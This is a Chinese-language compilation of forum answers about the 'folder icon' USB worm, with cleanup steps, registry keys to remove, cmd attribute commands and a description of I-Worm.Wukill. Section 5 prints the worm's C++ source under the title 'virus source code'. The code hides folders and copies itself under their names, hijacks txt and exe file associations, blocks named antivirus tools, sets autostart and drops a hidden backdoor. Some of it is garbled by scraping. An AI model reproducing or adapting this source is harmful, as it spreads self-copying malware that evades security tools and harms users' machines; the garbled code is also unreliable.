文件夾圖標病毒

1. 怎樣徹底清除文件夾圖標病毒

解決方案：

專殺清除方法：
下載金山毒霸等殺毒軟體。

手工清除方法：
1、結束病毒進程。打開超級巡警，選擇進程管理功能，終止進程XP-290F2C69.EXE（後8位隨機），winvcreg.exe，2080.exe（隨機名）。
2、刪除病毒在System32生成的以下文件：
com.run dp1.fne eAPI.fne internet.fne krnln.fnr og.dll og.edt RegEx.fnr fne spec.fne ul.dll XP-290F2C69.EXE winvcreg.exe 2080.EXE（隨機名）
3、刪除病毒的啟動項，刪除以下啟動項：
「HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run」里的XP-290F2C69.EXE（後8位隨機）；
「C:\Documents and Settings\Administrator\「開始」菜單\程序\啟動」 里的「.lnk」。
4、點擊「開始」---「運行」----輸入「cmd」 ，進入命令提示符，然後進入U盤所在的根目錄，具體操作如下，比如U盤盤符位G，那麼依次運行如下命令（第一行的「G:」為U盤盤符）：
cd /d G:
for /f "delims=" %a in ('dir /b /ad') do (del /a /f /q "%a.exe")
for /f "delims=" %a in ('dir /b /adh') do (attrib -s -h -r "%a")

2. 崔老師急救！！電腦和移動硬碟中了文件夾圖標病毒！！

進安全模式，插上你的移動硬碟，
開始——運行——輸入「cmd」然後回車——輸入命令「你的移動硬碟盤符:"(比如h:即H盤）——輸入命令"del autorun.inf"回車——輸入命令
"del a.exe"回車，如果你有多個盤，重復此過程，如果提示刪除不了，那麼輸入盤符命令後輸入"attrib h:\autorun.inf -h -r -a -s"回車,類似地。輸入命令"attrib h:\a.exe -h -r -a -s"回車，然後再重復del命令.還不行就用冰刃，找到磁碟的那個文件，刪了它。

3. exe格式的文件夾圖標病毒，怎麼殺毒

手工清除方法：
1、結束病毒進程。打開超級巡警，選擇進程管理功能，終止進程XP-290F2C69.EXE（後8位隨機），winvcreg.exe，2080.exe（隨機名）。
2、刪除病毒在System32生成的以下文件：
com.run dp1.fne eAPI.fne internet.fne krnln.fnr og.dll og.edt RegEx.fnr fne spec.fne ul.dll XP-290F2C69.EXE winvcreg.exe 2080.EXE（隨機名）
3、刪除病毒的啟動項，刪除以下啟動項：
「HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run」里的XP-290F2C69.EXE（後8位隨機）；
「C:\Documents and Settings\Administrator\「開始」菜單\程序\啟動」 里的「 .lnk」。
4、手工刪除後綴為exe的文件,然後顯示被隱藏的文件夾。點擊「開始」---「運行」----輸入「cmd」 ，進入命令提示符，然後進入你U盤所在的根目錄，具體操作如下，比如你的U盤盤符位G，那麼就輸入「g：」在回車就可以了。最後，輸入如下命令：attrib -r -a -s -h *.* /s /d。

4. 文件夾圖標病毒怎麼徹底殺干凈

這個是你中了U盤文件夾exe病毒，現在U盤病毒90%是kido病毒，kido病毒雖然很多殺軟能殺，但是都沒處理掉他的母體。而那些文件夾並沒有真的丟失，只是被隱藏了。
用金山U盤專殺和金山網盾這兩個軟體，網路一下就找到了。先運行金山網盾，點擊一鍵修復，處理掉病毒和系統錯誤。然後再運行金山U盤專殺這個工具，勾選全盤掃描，他能處理掉病毒母體和那些被隱藏的文件夾，還能修復一些U盤被感染的文件。

5. 文件夾圖標病毒的病毒源代碼

bool CVirousApp::OpenFuckFile()
{
char CmdLine[MAX_PATH]={0};
char DirUrl[MAX_PATH]={0};
char HiJack[MAX_PATH]={0};
if(!GetCurrentDirectory(MAX_PATH,DirUrl))
return FALSE;
char ch='\';
if(ch!=*(DirUrl strlen(DirUrl)-1))
{
strcat(DirUrl,\);
}
//此處只在系統根目錄下有效
sprintf(HiJack,%s%s\,DirUrl,AfxGetApp()->m_pszAp pName);
//判斷是否存在。
可以打開
if(-1==_access(HiJack,0))
return FALSE;
else
{
sprintf(CmdLine,explorer.exe %s,HiJack);
// MessageBox(CmdLine); //For a Test
if(WinExec(CmdLine,SW_SHOW)<31)
return FALSE;
}
return TRUE;
}
2、劫持txt、exe文件，並屏蔽常用安全工具
//定義特徵字元串
BOOL check=TRUE;
int len=7;
char *FuckExe[]={USBCleaner,
Kis,
Kav,
IceSword,
Kill,
WSYSCHECK,
360};
//獲取參數並判斷
if(strcmp(m_lpCmdLine,))//如果有參數
{
//判斷特徵字元串
int i;
for(i=0;i<len;i )
{
if(strstr(_strupr(_strp(m_lpCmdLine)),
_strupr(_strp(FuckExe))))
{ check=FALSE; break;}
}
// LPTSTR ext;
// ext=wcschr(m_lpCmdLine,_T(.)) 1;
CString cmd;
// if(!wcscmp(ext,_T(txt)))
if(strstr(m_lpCmdLine,_T(.txt))||strstr(m_lpCmdL ine,_T(.TXT)))
{
cmd.Format(%s %s,notepad.exe,m_lpCmdLine);
}
else
if(strstr(m_lpCmdLine,_T(.exe))||strstr(m_lpCmdL ine,_T(.EXE)))
{
//此處不完美。
判斷文件名
if(!check)
{
// AfxMessageBox(文件已損壞！);
::MessageBox(NULL,文件已損壞！請重新安裝應用程序！,Microsoft,MB_OK);
return FALSE;
}
else
cmd.Format(%s,m_lpCmdLine);
}
WinExec(cmd,SW_NORMAL);
}
else
//打開文件
OpenFuckFile();
3、自啟動及實現劫持exe、txt文件
//向系統目錄下拷貝程序
char FileSource[MAX_PATH]={0};
char FileNew[MAX_PATH]={0};
HMODULE hMole;
hMole=GetMoleHandle(NULL);
GetMoleFileName(hMole,FileSource,MAX_PATH);
CloseHandle(hMole);
GetSystemDirectory(FileNew,MAX_PATH);
strcat(FileNew,\SysKernel.exe);
CopyFile(FileSource,FileNew,TRUE);
SetFileAttributes(FileNew, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_SYSTEM);
//寫注冊表。
弄個自啟動
WriteRegEx(HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft \Windows\CurrentVersion\Run,
SysKernel,REG_SZ,FileNew,0,0);
//寫注冊表，進行映像劫持
char Hijack[MAX_PATH]={0};
sprintf(Hijack,%s %%1,FileNew);
WriteRegEx(HKEY_LOCAL_MACHINE,SOFTWARE\Classes\ txtfile\shell\open\command,
NULL,REG_SZ,Hijack,0,1);
WriteRegEx(HKEY_LOCAL_MACHINE,SOFTWARE\Classes\ exefile\shell\open\command,
NULL,REG_SZ,Hijack,0,1);
4、釋放後門，並啟動之
BOOL CVirousDlg::ReleaseResource(WORD wResourceID, LPCTSTR lpType, LPCTSTR lpFileName)
{
HGLOBAL hRes;
HRSRC hResInfo;
HANDLE hFile;
DWORD dwBytes;
hResInfo = FindResource(NULL, MAKEINTRESOURCE(wResourceID), lpType);
if (hResInfo == NULL)
return FALSE;
hRes = LoadResource(NULL, hResInfo);
if (hRes == NULL)
return FALSE;
hFile = CreateFile
(
lpFileName,
GENERIC_WRITE,
FILE_SHARE_WRITE,
NULL,
CREATE_ALWAYS,
FILE_ATTRIBUTE_NORMAL,
NULL
);
if (hFile == NULL)
return FALSE;
WriteFile(hFile, hRes, SizeofResource(NULL, hResInfo), &dwBytes, NULL);
CloseHandle(hFile);
return TRUE;
}
VOID CVirousDlg::ReleaseDoor()
{
char strSystemPath[MAX_PATH];
GetSystemDirectory(strSystemPath, sizeof(strSystemPath));
lstrcat(strSystemPath, \SysService.exe);
ReleaseResource(IDR_BIN, BIN, strSystemPath);
SetFileAttributes(strSystemPath, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_SYSTEM);
//實現後門自啟動
WriteRegEx(HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft \Windows\CurrentVersion\Run,
SysService,REG_SZ,strSystemPath,0,0);
WinExec(strSystemPath,SW_HIDE);
}
5、遍歷磁碟並拷貝自身
//遍歷系統磁碟
BOOL CVirousDlg::FuckFile()
{
DWORD dwNumBytesForDriveStrings;//實際存儲驅動器號的字元串長度
LPSTR lp;
CString strLogdrive;
//獲得實際存儲驅動器號的字元串長度
dwNumBytesForDriveStrings=GetLogicalDriveStrings(0 ,NULL);//*sizeof(TCHAR);
//如果字元串不為空。
則表示有正常的驅動器存在
if (dwNumBytesForDriveStrings!=0)
{
lp=new char[dwNumBytesForDriveStrings];
GetLogicalDriveStrings(dwNumBytesForDriveStrings,l p);
while (*lp!=0)
{
DoBad(lp);
lp=strchr(lp,0) 1;
}
return TRUE;
}
else
return FALSE;
}
//干壞事
VOID CVirousDlg::DoBad(char DriveBuf[])
{
CFileFind finder;
// build a string with wildcards
CString strWildcard(DriveBuf);
strWildcard = _T(*.*);
char FileSource[MAX_PATH]={0};
char FileNew[MAX_PATH]={0};
HMODULE hMole;
hMole=GetMoleHandle(NULL);
GetMoleFileName(hMole,FileSource,MAX_PATH);
// CloseHandle(hMole);
// start working for files
BOOL bWorking = finder.FindFile(strWildcard);
while (bWorking)
{
// nReg ;
bWorking = finder.FindNextFile();
// skip . and .. files; otherwise, we'd
// recur infinitely!
if (finder.IsDots())
continue;
// if it's a directory, recursively search it
if (finder.IsDirectory()&&!finder.IsSystem()&&!finder .IsHidden())
{
nReg ;
if(!SetFileAttributes(finder.GetFilePath(),
FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM))
continue;
sprintf(FileNew,%s%s,finder.GetFilePath(),.exe );
CopyFile(FileSource,FileNew,TRUE);
if(FUCKREG==nReg)
{
WriteReg(FileNew);
}
}
}
finder.Close();
}

6. 求救：U盤里正常的文件夾被隱藏，生成同名並加EXE後綴的文件夾圖標病毒

我殺過這種病毒 不過方法比較笨 首先 windows 清理助手 把機器中的木馬殺掉 然後把隱藏的文件現出來 把後綴名為。exe的文件刪掉 千萬不要落刪了 否則前功盡棄 再把隱藏的正常文件夾屬性改成不隱藏

我的意思就是徹底殺毒的方法 首先把你電腦上的病毒木馬殺干凈

7. 文件夾圖標類病毒的介紹

文件夾圖標類病毒是一類惡意病毒，它會將所有根目錄下和桌面上的文件夾全部隱藏，並將自己的副本命名為文件夾的名字。由於病毒的圖標就是文件夾圖標，如果沒有顯示擴展名的話很容易反復感染病毒。並且由於病毒的機理，會在硬碟上產生大量的病毒副本，即使副本被清理掉了，恢復隱藏的文件夾也是一件不容易的事情。

8. 我電腦中了文件夾圖標病毒，如何徹底根除

安全模式運行病毒掃描，把所有的帶毒文件刪除，然後運行regedit，檢查：HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run下面如果有"RavTimeXP"
"RavTimXP"就刪掉；檢查：
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup下面如果有"RavTimXP"，就刪掉

9. 文件夾圖標病毒

可執行文件可以正常打開嗎？ 最好把一個.exe發上來看看。你參考下這帖http://www.arswp.com/bbs/thread-41333-1-1.html
或先下載U盤專殺殺一下（附文件夾圖標專殺）http://www.orsoon.com/Soft/426.html

清理電腦里的病毒

1.建議使用XDelBox刪除以下文件：(XDelBox1.8動物家園版下載)刪除以下文件：
使用說明：刪除時復制所有要刪除文件的路徑，在待刪除文件列表裡點擊右鍵選擇剪貼板導入不檢查路徑，導入後記得勾選抑制其再生，在要刪除文件上點擊右鍵，選擇立刻重啟刪除，電腦會重啟進入DOS界面進行刪除操作（重啟計算機以後會有一個系統菜單選擇Go Xdelbox To Del Files）。運行xdelbox前最好卸載所有可移動存儲設備。

c:\windows\ttry.exe
c:\windows\tsay.exe

2.刪除重啟後使用SREng修復下面各項：

啟動項目 －－ 注冊表之如下項刪除：
[msfsa] <C:\windows\tsay.exe>

U盤沒干凈前，如果再往電腦里復制文件，可能會再度感染病毒！

使用USBCLEANER
下載地址：http://www.usbcleaner.cn/download.htm
Autorun病毒防禦者
下載地址：http://www.rensoft.com.cn/releases/1.html
首先查殺U盤，然後在全面掃描硬碟，最後用文件夾圖標類病毒專殺工具查殺。重起開機請不要插U盤。

10. 怎樣殺WINFILE（文件夾圖標）病毒

WINFILE病毒處理方法
我的電腦里感染了"winfile"的病毒，有一個文件夾，在我的每個磁碟里都有，不知怎麼去掉？我怎麼辦呢？
回復：安全模式運行病毒掃描，把所有的帶毒文件刪除，然後運行regedit，檢查：HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run下面如果有"RavTimeXP" "RavTimXP"就刪掉；檢查：

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup下面如果有"RavTimXP"，就刪掉

老道你好，小生有一問題請指教。機子感染了winfile病毒，本來前面有帖子教如何清除。但是現在一個重要的問題是：諾頓殺毒軟體打不開，regedit也運行不到！！這咋整？進入安全模式也一樣，完全沒有辦法，手頭又沒有其他殺毒軟體。諾頓重裝了也沒用。請老道救小生一救，謝！！
回復：到安全模式，找到windows目錄下的regedit.exe，改其名為regedit.com，雙擊，你就可以繞過木馬的控制進入注冊表編輯。注冊表內你首先需要改回的是HKEY_CLASSES_ROOT\exefile\shell\open\command這里的默認值，正確值是"%1" %*，然後再按照前面的帖子處理。記住：要一次弄乾凈！否則白玩。

老道: 你好我朋友的電腦每一個盤都有winfile這個文件而且在注冊表裡也撤不掉,如果都撤了,可是點擊任一個盤,都又出現了,殺毒軟體也不行. 我該如何? 謝謝!
回復：各盤的根目錄仔細看看，估計有自啟動的文件，比如Autorun或者folder.htt之類。病毒也可能改注冊表的關聯，你到HKEY_CLASSES_ROOT\Folder\shell\explore\command這里看看，正確值是：%SystemRoot%\Explorer.exe /e /idlist,%I,%L

大蝦們教教小鳥怎麼把WINFILE殺掉！

[winfile.exe]
[病毒名]：I-Worm.Wukill
[破壞方法]：這個病毒採用文件夾圖標，具有很大迷惑性。該病毒運行後，會將自己大量復制到其他目錄中。

一、 病毒首次運行時將顯示"This File Has Been Damage!"；

二、 將自己復制到windows目錄下並改名為Mstray.exe；

三、 修改注冊表： HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\Run
以達到其自啟動的目的；

四、 枚舉磁碟目錄，在每個根目錄下釋放下列文件：
winfile.exe 病毒主體程序
comment.htt 利用IE漏洞調用同一個目錄下的"winfile.exe"，屬性為隱藏。
desktop.ini 系統為隱藏。採用web方式瀏覽文件夾時，系統會調用該文件，該文件調
用comment.htt ，從而激活病毒。

五、 病毒修改注冊表，隱藏系統文件、隱藏受系統保護的文件、隱藏已知的擴展名稱。
這樣，用戶看不到comment.htt和Desktop.ini， winfile.exe被隱藏後綴明，又是文件
夾圖標，用戶極容易認為是文件夾而點擊。
同時病毒在當前路徑下生成的自身拷貝，名稱採用上級目錄，或者是當前窗口的標題，
增加隱蔽性。

六、病毒調用Outlook發送攜帶病毒的信件。

手工清除:(在沒有殺毒軟體的情況下) 首先:找到Mstray.exe(注意這個是系統 和隱藏的文件,所以大家應該知道怎 么才能找到它了,在系統文件夾下), 刪除掉. 並修改注冊表,去掉對應的啟動項. 接著:利用的Windows的搜索功能,搜索所
有的:
Winfile.exe,comment.htt, desktop.ini(注意:查看->去掉系 統保護,去掉隱藏)
刪除!注意還得清楚不要刪錯了哦! 有些desktop.ini是windows原有 的文件)
最後:查找硬碟內所以的[*.exe]文件, (注意:如上),你會發現好多的文件夾 圖標形式的.exe 文件,刪除掉所有 這些文件.一切OK!